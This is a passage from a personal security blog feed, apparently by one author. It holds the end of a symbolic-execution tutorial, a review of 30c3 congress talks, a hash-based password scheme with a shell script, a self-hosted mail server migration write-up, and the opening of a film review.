&lt;p&gt;In the binary we have two transformations: one that decodes HEX strings and one
that decompresses RLE encoded buffers. These transformations are implemented
just like the PDF specification recommends them and the fun thing is that PDF
allows recursive encodings, so an object inside a PDF file can be encoded using
a set of transformations and may include other PDFs as well.&lt;/p&gt;
&lt;p&gt;Reversing all transformations in one large step is usually not feasible for SE
because of the state explosion. There are just too many symbolic bytes to carry
along and too much state that accumulates. But single transformations are
completely within the scope of SE. In &lt;a class="reference external" href="https://nebelwelt.net/publications/files/13ESORICS.pdf"&gt;the HICFG paper&lt;/a&gt;, &lt;a class="reference external" href="https://nebelwelt.net/publications/files/13TRhicfg.pdf"&gt;the first TR&lt;/a&gt;, or &lt;a class="reference external" href="https://nebelwelt.net/publications/files/13TRhicfg2.pdf"&gt;the second TR&lt;/a&gt; we define an analysis
technique that allows a concretization of symbolic values at transformation
boundaries, minimizing the state that needs to be carried from one
transformation to the other. If you are interested in the details then I'd
advise you to read the papers. On a high level, we split a large single SE
computation into several smaller SE computations with intermediate concrete
execution steps.&lt;/p&gt;
&lt;p&gt;Looking at our binary we can define two transformations, reversing the RLE
encoding first and the HEX encoding in a second step. This allows us to define
a target string that is then RLE compressed and HEX encoded using the
RLE &lt;em&gt;decompression&lt;/em&gt; code and the HEX &lt;em&gt;decoding&lt;/em&gt; code.&lt;/p&gt;
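&lt;p&gt;The inverse direction can be prototyped concretely in a few lines. The
Python sketch below uses a simplified PDF-style run-length code (a length byte
n in 0..127 followed by n+1 literal bytes, with 128 as end-of-data marker;
repeat runs are omitted), so it only illustrates the idea and is not the exact
binary from the example:&lt;/p&gt;

```python
# Invert each transformation separately: RLE-*encode* the target first,
# then hex-*encode* the result; the binary's two decoders undo both steps.
# Simplified PDF-style RLE, literal runs only (illustrative sketch).

def rle_encode(data):
    out = []
    i = 0
    while i != len(data):
        run = data[i:i + 128]  # literal run of up to 128 bytes
        out.append(len(run) - 1)
        out.extend(run)
        i += len(run)
    out.append(128)            # end-of-data marker
    return bytes(out)

def rle_decode(data):
    out = []
    i = 0
    while data[i] != 128:
        n = data[i] + 1        # length byte n-1 means n literal bytes
        out.extend(data[i + 1:i + 1 + n])
        i += 1 + n
    return bytes(out)

target = b"Correctly recovered str"
crafted = rle_encode(target).hex()  # feed this hex string to the binary
print(crafted)
print(rle_decode(bytes.fromhex(crafted)) == target)  # round trip holds
```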
&lt;p&gt;You can execute the example as follows:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
$ cd ~/SE/playground/hexrle
$ ./run_se.sh
&lt;/pre&gt;
&lt;p&gt;Again, I invite you to look at the individual files, play around with them,
peek into the binaries using objdump and have fun with the SE engine.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="wrapping-up"&gt;
&lt;h2&gt;Wrapping up&lt;/h2&gt;
&lt;p&gt;In this blog post I've given you a gentle introduction to symbolic execution,
shown how you can use it to reverse engineer an input that
triggers a condition of your choosing, and how you can optimize the SE process
to scale to a larger number of symbolic input bytes. I hope you enjoyed the
read! I'm always happy about comments, feedback, or questions. You can find me
on &lt;a class="reference external" href="https://twitter.com/gannimo"&gt;twitter&lt;/a&gt; or just send me a mail.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Security"></category><category term="symbolic execution"></category><category term="security"></category><category term="howto"></category><category term="introduction"></category></entry><entry><title>30c3, a log of the 30th chaos communication congress</title><link href="/blog/2013/1230-30c3-a_yearly_hackers_gettogether.html" rel="alternate"></link><published>2013-12-30T00:00:00-05:00</published><updated>2013-12-30T00:00:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-12-30:/blog/2013/1230-30c3-a_yearly_hackers_gettogether.html</id><summary type="html">&lt;p class="first last"&gt;Just like every year I visited the 30c3, a hacker congress in Hamburg. This blog post summarizes my experiences and lists talks that you should watch.&lt;/p&gt;
</summary><content type="html">&lt;div class="section" id="the-same-procedure-as-every-year"&gt;
&lt;h2&gt;The same procedure as every year&lt;/h2&gt;
&lt;p&gt;In the last 10 years I have visited the chaos communication congress 9 times (at the
beginning of my first talk I wrongly stated that it was my 10th visit in 11
years, I stand corrected) and year after year my friends and I had an awesome
time. After missing the 29c3 in 2012 due to having recently immigrated to the
US I really wanted to go to the 30c3. These hacker congresses are an awesome
opportunity for researchers to synchronize with other hackers and to exchange
and discuss new ideas for future projects. I also enjoy syncing up with all my
friends that I happen to meet at the c3 between x-mas and new year's eve.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="getting-there-and-exploring-the-new-location"&gt;
&lt;h2&gt;Getting there and exploring the new location&lt;/h2&gt;
&lt;p&gt;As I was already in Europe to visit family over x-mas getting there was fairly
easy with just one short direct flight of about an hour. Hamburg is a great
location, and the airport is just a short train ride from the city center
(almost comparable to Zurich). The chaos communication congress moved from the
BCC (Berlin Congress Center) in Berlin to the CCH (Congress Center Hamburg) in
Hamburg in 2012 and this was the second time at the newer, bigger location that
would not be too small or too crowded for the next several years. First of all,
the location is much bigger and many things changed compared to the BCC. It is
no longer a cozy, familiar atmosphere like in the old days of the 21c3 or so.
There are roughly 10k hackers, nerds, journalists, and other agents walking
around and if you don't know people already it is kind of hard getting to know
them. Comparable to Defcon, the 30c3 has become more of a privileged event with
different classes and due to the sheer size you tend to stick to the people you
already know. I still met a bunch of new people and tried to get to know some
random people as well, but I felt that it was getting harder.&lt;/p&gt;
&lt;p&gt;Regarding the new location I must say that I like the CCH. It took me the
better part of the first day to find my bearings but navigation was smooth
afterwards (i.e., I could just follow the tubes for the Seidenstrasse project,
a large, ad hoc pneumatic delivery system). Maybe for future events the c3
organizers should add (more) routing signs for newcomers, especially if it gets
even more crowded.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="technical-talks"&gt;
&lt;h2&gt;Technical talks&lt;/h2&gt;
&lt;p&gt;In this section I want to highlight a bunch of technical talks I watched during
the 30c3. There were way too many good talks to list all of them here and there
is not enough space to write about all of them in detail. My intention is to
encourage you to follow the links and to watch the talks as well. The talks are
rated from 1 (bad, don't watch) to 10 (awesome, you have to watch this
immediately). My talks are marked ?; obviously my opinion is that they are
great but I'll let you judge them for yourself.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5477.html"&gt;An introduction to firmware analysis: Stefan Widmann&lt;/a&gt; &lt;em&gt;(4)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In this talk, Stefan gives us a quick and dirty overview of different firmware
analysis tools and individual steps needed to recover, analyze, and disassemble
firmware of an unknown device.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5224.html"&gt;Triggering Deep Vulnerabilities Using Symbolic Execution: gannimo&lt;/a&gt; &lt;em&gt;(?)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Symbolic execution is a great tool that can be used to help a programmer
find some input that will trigger a well defined condition inside a binary
program. In this talk we learn the concepts of symbolic execution, potential
use cases, and how far we can scale symbolic execution (i.e., for what tasks it
is feasible).&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5449.html"&gt;Mobile network attack evolution:  Karsten Nohl, Luca Melette&lt;/a&gt; &lt;em&gt;(6)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Another iteration of the &lt;em&gt;security in mobile networks&lt;/em&gt; topic by Karsten and
Luca. The talk was entertaining and interesting while they did not present too
many new things.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5412.html"&gt;Bug class genocide: Andreas Bogk&lt;/a&gt; &lt;em&gt;(7)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Andreas fights for memory safety guarantees for low level languages. He took
some time to tell us about all the possible memory corruption vulnerabilities
that exist in low level code and advocates to use compiler extensions like
SoftBound+CETS that enforce (some form of) memory safety for C and C++.
Currently he is working on porting FreeBSD (and SoftBound+CETS) to offer a safe
version of the FreeBSD distribution where memory corruption is no longer
possible. Unfortunately, this will cost some runtime performance and while he
was not explicit about the overhead, the original papers mention up to 300%
runtime overhead.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5618.html"&gt;Baseband Exploitation in 2013: RPW, esizkur&lt;/a&gt; &lt;em&gt;(4)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Baseband chips and operating systems changed a lot in recent years. Most
new mobiles and smart phones produced in recent years run on Qualcomm chips.
Exploitation of these systems got much harder due to additional security
hardening of the operating system and a change of the CPU architecture. This
talk explains how we can still hack these systems.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5542.html"&gt;Revisiting &amp;quot;Trusting Trust&amp;quot; for binary toolchains:  sergeybratus, Julian
Bangert, bx&lt;/a&gt;
&lt;em&gt;(9)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I must say I love Sergey's talks (especially the ones at the c3); they are
always fun, usually go several layers down into the system architecture, and I
always learn something new. This time Sergey and his companions talked about
Turing-complete computation using only ELF relocations. Using different forms
of relocations you can force the standard loader to rewrite partial relocation
entries and trigger additional relocations, resulting in Turing-complete
modification of the program during the loading process (i.e., after
verification but before the first instruction of the application is executed).&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5459.html"&gt;Security of the IC Backside: nedos&lt;/a&gt; &lt;em&gt;(4)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A nice overview talk about reverse engineering and attacking integrated circuits
from the backside. Instead of going down from the top (facing potential reverse
engineering countermeasures) one can start from the bottom and work up through the
layers. This talk gives an introduction to this reverse engineering process.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5582.html"&gt;SCADA StrangeLove 2:  repdet, sgordey&lt;/a&gt; &lt;em&gt;(3)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;SCADA is still bad, m'kay. New examples of how bad SCADA systems are in the
real world, including some details on SCADA systems that are connected to the
internet and are openly accessible.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5192.html"&gt;Android DDI: Collin Mulliner&lt;/a&gt; &lt;em&gt;(5)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Android reverse engineering is a potentially hard problem due to the mix of
native code and Dalvik bytecode. This talk presents an approach to instrument
the Dalvik part of an Android application with some additional features. In the
talk Collin gives some nice examples on how to circumvent in-store purchases
resulting in free stuff.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5380.html"&gt;Persistent, Stealthy, Remote-controlled Dedicated Hardware Malware:
Patrick Stewin&lt;/a&gt;
&lt;em&gt;(5)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In the beginning malware executed on the same privilege level as the
anti-malware software. Over time, the anti-malware software tried to move up on
the levels of abstraction (and privileges) to keep control even if the malware
was able to successfully gain control of one privilege level. In this talk we
learn that malware may move up to the hardware level, circumventing all
possible protection mechanisms.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5223.html"&gt;WarGames in memory: gannimo&lt;/a&gt; &lt;em&gt;(?)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In my second talk I discuss memory safety violations in general and memory
corruption vulnerabilities in particular. At the core, memory safety violations
are the cause of many of the exploitable bugs in programs written in low-level
languages like C or C++. In the talk we discuss a model of the
capabilities an attacker needs to execute a control-flow hijack attack
(starting with the initial memory safety violation). In the later part we
discuss different strategies that would stop the attack from succeeding, why
current defense mechanisms are not sufficient, and what the future will bring
us.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5445.html"&gt;Virtually Impossible: The Reality Of Virtualization Security: Gal Diskin&lt;/a&gt; &lt;em&gt;(6)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Going down the ISA rabbit hole. Gal lectures on the low-level security
implications that virtualization brings and the kind of pitfalls we
face when using different virtualization technologies. A hardcore talk with lots
of low-level details.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5304.html"&gt;CounterStrike: FX&lt;/a&gt; &lt;em&gt;(7)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I wondered for a long time whether I should file this talk under the political/social
talks or under the technical talks. FX delivers a great rant about lawful
interception, how governmental tracking works, and what we might be able to do
about it. Not his best talk but highly entertaining.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="political-social-talks"&gt;
&lt;h2&gt;Political/social talks&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5622.html"&gt;30c3 Keynote: Glenn Greenwald&lt;/a&gt; &lt;em&gt;(6)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Glenn talks about his involvement in the Snowden leaks. At the beginning of
their relationship Glenn was a bit of a newbie to all the crypto tools that Snowden
expected a trusted contact to use. Glenn is a great speaker and he discusses how
he collaborated and worked with the leaked documents, deciding when to release
which parts and how to structure the whole story.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5608.html"&gt;Jahresrückblick des CCC:  Constanze Kurz, frank, Linus Neumann&lt;/a&gt; &lt;em&gt;(3)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A political talk about the activities of the CCC in the past year. After an
awesome introduction they discussed the ups and downs of the computer club.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5577.html"&gt;Hacker Jeopardy&lt;/a&gt; &lt;em&gt;(7)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Most awesome game show ever. It's jeopardy. For hackers.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2013/Fahrplan/events/5490.html"&gt;Fnord News Show: frank, Fefe&lt;/a&gt; &lt;em&gt;(8)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Frank and Fefe give highlights on the best fnords of the last year. One of the
best talks at the congress (as usual).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="talks-i-have-not-watched-yet"&gt;
&lt;h2&gt;Talks I have not watched yet&lt;/h2&gt;
&lt;p&gt;Due to the tight schedule this year I missed way too many great talks. Luckily
all the talks were recorded and will be made available in the next couple of
days (so expect a follow-up blog post on other talks worth watching).&lt;/p&gt;
&lt;dl class="docutils"&gt;
&lt;dt&gt;A (short) list of the many talks I want to watch in the next weeks includes:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last simple"&gt;
&lt;li&gt;The Year in Crypto:  Nadia Heninger, djb, Tanja Lange&lt;/li&gt;
&lt;li&gt;Hardware Attacks, Advanced ARM Exploitation, and Android Hacking: Stephen A. Ridley&lt;/li&gt;
&lt;li&gt;Fast Internet-wide Scanning and its Security Applications: J. Alex Halderman&lt;/li&gt;
&lt;li&gt;Security Nightmares: frank, Ron&lt;/li&gt;
&lt;li&gt;and probably all other technical talks in due time.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="privacy"></category><category term="security"></category><category term="congress"></category><category term="30c3"></category><category term="ccc"></category></entry><entry><title>How to choose secure passwords for insecure websites</title><link href="/blog/2013/1118-on-passwords.html" rel="alternate"></link><published>2013-11-18T00:00:00-05:00</published><updated>2013-11-18T00:00:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-11-18:/blog/2013/1118-on-passwords.html</id><summary type="html">&lt;p class="first last"&gt;Protect your passwords for low-security websites using cryptographic hashes.&lt;/p&gt;
</summary><content type="html">&lt;div class="section" id="too-many-accounts"&gt;
&lt;h2&gt;Too many accounts&lt;/h2&gt;
&lt;p&gt;Most websites require an account to access even basic functionality and
therefore need a dedicated password. A simple idea would be to reuse one single
password for all these low-security websites, but this is (i) insecure, as it
reduces the security of all your accounts to that of one single compromised account,
and (ii) impractical, as many of these websites have different password requirements
(e.g., different lengths, combinations of upper and lower case, or even special
characters). Another convenient alternative is to use a synchronized password
manager that stores your passwords somewhere in the cloud. One still has to
choose a new, secure password for each website but the cloud (e.g., Google
Chrome or Mozilla's Firefox) will take care of both the synchronization across
devices and backups. The disadvantage of password managers is that the password
manager must now be trusted and the cloud provider (often) has power over all
passwords. If the password manager is compromised then all accounts are broken.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="customized-passwords"&gt;
&lt;h2&gt;Customized passwords&lt;/h2&gt;
&lt;p&gt;A simple alternative I've used for some time now (for insecure websites) is
concatenating the domain name of the website with a common shared password
(e.g., &amp;quot;nebelwelt.netSharedKey&amp;quot;). This way, each website has its own dedicated
password and the passwords are easy to remember. I've used this approach for
all my 'insecure' websites that just forced me to register an account to access
basic functionality and where I did not want to bother with a secure password.&lt;/p&gt;
&lt;p&gt;Unfortunately, the security of all accounts then depends on one plaintext-password
offender (one website that stores the password in plaintext) or one website
with a weak, reversible hash algorithm. In my case, I got burned by the
big Adobe breach (I was forced to create an Adobe account when I wanted to
download an ebook from my local library because the ebooks are all protected
with DRM crap - torrenting the books would have saved me from changing all
passwords, but that's another story). My shared password itself is pretty long
and contains letters, numbers, and special characters, so I assume it will
hold out for a bit, but I still changed all passwords for good measure.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hashed-passwords"&gt;
&lt;h2&gt;Hashed passwords&lt;/h2&gt;
&lt;p&gt;To protect against the single-offender problem, an attacker should not
be able to guess the (obvious) shared password and domain parts from one
single recovered cleartext password. Cryptographic hashes are one-way
functions that accomplish exactly that. The simple shell command &amp;quot;echo -n
nebelwelt.netSharedPassword | sha1sum | xxd -r -p | base64 | colrm $((len+1))&amp;quot;
generates the SHA-1 hash of the concatenated string, re-encodes it from base16 to
base64 to increase the number of different characters used, and cuts it down to
the required length. Such a generated password has very high entropy (in
the base64 charset) and even a shorter password should be more secure than any
word combination you might choose yourself (a combination of word-list entries is not as
random as you might think) or 'random' letters you pick yourself, as humans do
a really bad job as random number generators. If the website requires a special
character I just append an exclamation mark at the end (as my password already
has high enough entropy I do not care about the couple of bits added through
special characters).&lt;/p&gt;
&lt;p&gt;If an attacker recovers one single account password, all other passwords are
still safe, while the scheme remains easy to remember. The only drawback is
that instead of just concatenating the domain name and the shared key in my
head I now have to run a quick shell command.&lt;/p&gt;
&lt;p&gt;While this solution is not perfect, I only have to remember one single password
for all low-security websites and I only need access to a simple terminal to
recover a password. The advantages are that I neither need to trust a password
manager nor can an attacker compromise multiple accounts from one single leaked
password (oh, and as a pro tip: prefix the shell command with a space so that
your password does not end up in the bash history file, provided your
HISTCONTROL includes ignorespace).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;#!/bin/bash
[[ -n &amp;quot;$1&amp;quot; ]] || { echo -e &amp;quot;usage: give domain name to make hashed password. \n\n
Example:\n
./passhash nebelwelt.net 8\n
&amp;quot;; exit 0;}

len=$2
key=YourSecredSharedPassword
[[ -n &amp;quot;$2&amp;quot; ]] || len=8
echo -n $1$key |sha1sum | xxd -r -p | base64 | colrm $(($len+1))
&lt;/pre&gt;&lt;/div&gt;
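&lt;p&gt;As a minimal sketch of what the script does, step by step (the domain and
the placeholder secret are examples; substitute your own values):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;# concatenate domain and shared secret, hash with SHA-1,
# re-encode base16 -&amp;gt; base64, and keep the first 8 characters
domain=nebelwelt.net
key=YourSecretSharedPassword   # placeholder, not a real secret
pw=$(echo -n &amp;quot;$domain$key&amp;quot; | sha1sum | xxd -r -p | base64 | colrm 9)
echo &amp;quot;$pw&amp;quot;   # 8 base64 characters
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The base64 re-encoding matters: SHA-1 output in hex only uses 16 different
characters, while base64 packs more entropy into each of the 8 characters
that survive the truncation.&lt;/p&gt;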
&lt;/div&gt;
</content><category term="Security"></category><category term="passwords"></category><category term="privacy"></category><category term="security"></category></entry><entry><title>The day (or week) I left the Google cloud</title><link href="/blog/2013/1005-leaving-the-cloud.html" rel="alternate"></link><published>2013-10-05T00:00:00-04:00</published><updated>2013-10-05T00:00:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-10-05:/blog/2013/1005-leaving-the-cloud.html</id><summary type="html">&lt;p class="first last"&gt;The day I decided to leave the Google cloud and take the security and privacy of my data into my own hands.&lt;/p&gt;
</summary><content type="html">&lt;div class="section" id="let-me-start-with-a-couple-of-reasons-and-motivation-first"&gt;
&lt;h2&gt;Let me start with a couple of reasons and motivation first&lt;/h2&gt;
&lt;p&gt;Roughly 3 1/2 years ago I switched from a self-hosted service (mainly email, anti-spam, and some SquirrelMail-based webmail service) to the Google Apps for your domain cloud. Back in the day the service was still free for non-organizational entities and switching itself was fairly easy. The cloud promised and offered so many nice things: (i) no more time spent on server administration, (ii) more services, all of them for free, (iii) a better, faster, shinier web interface, and (iv) integration with mobile devices. Incidentally, 3 1/2 years ago was right when I got my first real smartphone (an HTC Desire, which is roughly equivalent to the Google Nexus), a couple of months before I started my Google internship in the safe-browsing team (fighting malware and phishing). Life was great and dandy, the services were up and running, and I quickly got used to the blazingly fast (at that time) web interface. I happily used GMail, Blogger, and a couple of accompanying services for roughly 2 years, then more and more glitches and other quirks started to annoy me.&lt;/p&gt;
&lt;p&gt;Some of the reasons why GMail is no longer a lean, fast service are:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;GMail is &lt;strong&gt;BIG&lt;/strong&gt;, every time you log in a couple of megabytes of data need to be transferred before you even see the mail interface. This is especially a pain when you're using a 3G link.&lt;/li&gt;
&lt;li&gt;It's about the UI (I don't want Google plus notifications ballooning up and Google hangouts fighting for my screen real estate, I want a fast email client).&lt;/li&gt;
&lt;li&gt;Tons of crashes and glitches (yeah, I'm talking about you hanging hangouts).&lt;/li&gt;
&lt;li&gt;Missing features in some countries (e.g., YouTube never rolled out for some European countries such as Liechtenstein; if my parents are logged into their GApps accounts they cannot watch YouTube, all they get is an obscure error message blaming the administrator; another example is the difficulty of sending a hangout invite between a GApps domain and a GApps for universities domain).&lt;/li&gt;
&lt;li&gt;Google dropping XMPP support when moving from GTalk to Hangouts.&lt;/li&gt;
&lt;li&gt;I started to get annoyed when Google dropped support for Google Reader which I replaced with a version of TinyTinyRSS running on my own server.&lt;/li&gt;
&lt;li&gt;and most important of all: I want to have control over my data (and privacy - as far as this is still possible).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Running my own servers allows me to go back to signed (and encrypted) emails, allows me to backup my own email, and to make sure that nobody else logs onto my server and reads my raw data.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="preparation"&gt;
&lt;h2&gt;Preparation&lt;/h2&gt;
&lt;p&gt;Switching email providers is not an easy task (if you want to keep your email address). The task becomes exponentially harder the more services you want to migrate and keep running. The services I am interested in are: IMAP (for email), contacts and calendar via CardDAV and CalDAV (for mobile support), and some web client to access my mail on the go. The tempting setup that Google offers is hard to drop and harder to replace. There is no open-source solution that provides all these services out of the box (except if you sacrifice all your security considerations and install a large blob of PHP files on your server that will wreak havoc on all your data). As I wanted to increase my privacy (and privacy can only be built on top of security) I had to roll my own setup.&lt;/p&gt;
&lt;p&gt;After looking at current mail servers, web clients, calendar, and contact software (the last time I had my own server I used Courier for IMAP, qmail for SMTP, sqwebmail for on-the-go webmail, and a simple SpamAssassin setup to kill spam) I decided on the following setup:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Postfix for full blown SMTP capabilities with all the bells and whistles (plus it's much easier to configure than qmail).&lt;/li&gt;
&lt;li&gt;Dovecot for IMAP (with IMAPS and a CaCert-signed certificate preferred).&lt;/li&gt;
&lt;li&gt;Roundcube for email access over https.&lt;/li&gt;
&lt;li&gt;DaviCal for calendar and contacts.&lt;/li&gt;
&lt;li&gt;Postfixadmin for simple administration of virtual domains, mailboxes, and aliases with a MySQL backend; the login credentials are shared between all the services (I did not want to keep a separate user database for each service).&lt;/li&gt;
&lt;li&gt;Spamassassin, ClamAV, Amavisd, and postgrey to fight spam.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What is currently missing is a chat server; I looked into ejabberd and was actually quite happy with the software running on the server side. My intention was to replace Google Talk/Hangouts with a Jabber client but during testing I discovered that no single current client in the Debian wheezy repository (my current desktop) supports video/audio chats between two clients, even if the clients run the same software. I did not even get to testing interoperability between clients or operating systems or extended features like multi-party hangouts. I considered using a SIP server like Asterisk for a short while but did not want to go into the hassle of configuring a full-blown PBX/call server.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-setup-server-side"&gt;
&lt;h2&gt;The Setup: Server Side&lt;/h2&gt;
&lt;p&gt;Our server (currently) runs Ubuntu 12.04 LTS and all the needed software and packages were already available in the main repository (so there's no need to install extra, untrusted packages).&lt;/p&gt;
&lt;p&gt;You can basically follow one of the many great howto's that are out there, e.g., the one on &lt;a class="reference external" href="https://help.ubuntu.com/community/PostfixCompleteVirtualMailSystemHowto"&gt;Ubuntu help&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What I learned in the process of setting up this mailserver is that running a secure mailserver has become much more complex in recent years. Nowadays you not only have to run your SMTP server and your IMAP or POP3 service but also Spamassassin, virus checking, greylisting, integration between services, and more. In addition to all the services described in the howto, I added SPF entries to my DNS, started signing outgoing emails using DKIM (provided by the OpenDKIM package), and set up Roundcube with IMAP authentication. The other additional service I'm running is DaviCal with IMAP authentication to support both CalDAV and CardDAV services for my clients with the same login credentials as my IMAP server.&lt;/p&gt;
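&lt;p&gt;For illustration, the corresponding DNS entries might look roughly like the
following zone-file fragment (the domain, selector, and key are placeholders,
not my actual records):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;; SPF: only this domain's MX and A hosts may send mail, reject the rest
example.com.                  IN TXT &amp;quot;v=spf1 mx a -all&amp;quot;
; DKIM: public key published under the selector configured in OpenDKIM
mail._domainkey.example.com.  IN TXT &amp;quot;v=DKIM1; k=rsa; p=&amp;lt;base64 public key&amp;gt;&amp;quot;
&lt;/pre&gt;&lt;/div&gt;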
&lt;/div&gt;
&lt;div class="section" id="the-setup-client-side"&gt;
&lt;h2&gt;The Setup: Client Side&lt;/h2&gt;
&lt;p&gt;On the client side I wanted a simple email/calendar/contact client that supports an offline mode. I quickly looked into mutt but after 2-3 hours of configuration hell, unable to figure out just the right shortcuts, I settled for Evolution as the main client. I keep all calendar and contact information on my local disk; email is downloaded using IMAP and cached locally as well. To keep calendar and contacts in sync across multiple devices I use syncevolution with the WebDAV backend.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="running-in-production"&gt;
&lt;h2&gt;Running in Production&lt;/h2&gt;
&lt;p&gt;I am now closing in on my first week without Google (or only using Google as an interim fallback if I'm unsure whether something worked, especially for calendar and contacts). So far I did not have any bad experiences except the odd weird mail I sent to some colleagues during testing and having to flush all contacts and calendar events 3 times when I messed up the import. Otherwise the services have been running smoothly and I did not lose any data (no old email, contacts, or calendar events).&lt;/p&gt;
&lt;p&gt;The hardest part (apart from setting up all this mess) is switching from the familiar Google user interface to, say, Evolution. In my opinion, the biggest change is going back to an old-school email client; in the last week I longed several times for the GMail-like threaded view where my answers are not just stored in the sent folder but also appear in the thread, so that I can quickly review my answers to open questions and discussions.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Going Google-less is possible but it is not easy. Setting up your own mailserver and testing the whole system will take you 3-4 full days and even after investing that much time you will not have all the convenience that the Google cloud offers. There will be delays, and your email will not be as snappy as GMail (the average request might take a little longer but, at least in my experience, there are no big latency spikes like the ones Google sometimes has).&lt;/p&gt;
&lt;p&gt;Things I really like: I am now in full control of my data, I can run my own backups of the full configuration and of my emails (which I do daily), I can sign my emails (signing has become a bit more common since the NSA revelations), and only the people I share my calendar and contacts with get access to them. In addition, if we send email between accounts on our server nobody else is able to read it, which is at least a step towards more privacy.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Security"></category><category term="cloud"></category><category term="privacy"></category><category term="security"></category><category term="self-hosted"></category></entry><entry><title>Gasland: worst documentary of all time?</title><link href="/blog/2013/0813-gasland-worst-documentary-of-all-time.html" rel="alternate"></link><published>2013-08-13T15:14:00-04:00</published><updated>2013-08-13T15:14:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-08-13:/blog/2013/0813-gasland-worst-documentary-of-all-time.html</id><summary type="html">&lt;p&gt;Why does Gasland have a rating of &lt;a class="reference external" href="http://www.imdb.com/title/tt1558250/?ref_=fn_al_tt_1&amp;amp;licb=0.4128461310174316"&gt;7.7 on IMDB&lt;/a&gt;? We tried watching that
movie yesterday but it was so terribly bad and suggestive that we had to
stop after 10 minutes.&lt;/p&gt;
&lt;p&gt;Don't get me wrong, I'm totally in favor of protecting the environment
and carefully (and conservatively) looking …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Why does Gasland have a rating of &lt;a class="reference external" href="http://www.imdb.com/title/tt1558250/?ref_=fn_al_tt_1&amp;amp;licb=0.4128461310174316"&gt;7.7 on IMDB&lt;/a&gt;? We tried watching that
movie yesterday but it was so terribly bad and suggestive that we had to
stop after 10 minutes.&lt;/p&gt;
&lt;p&gt;Don't get me wrong, I'm totally in favor of protecting the environment
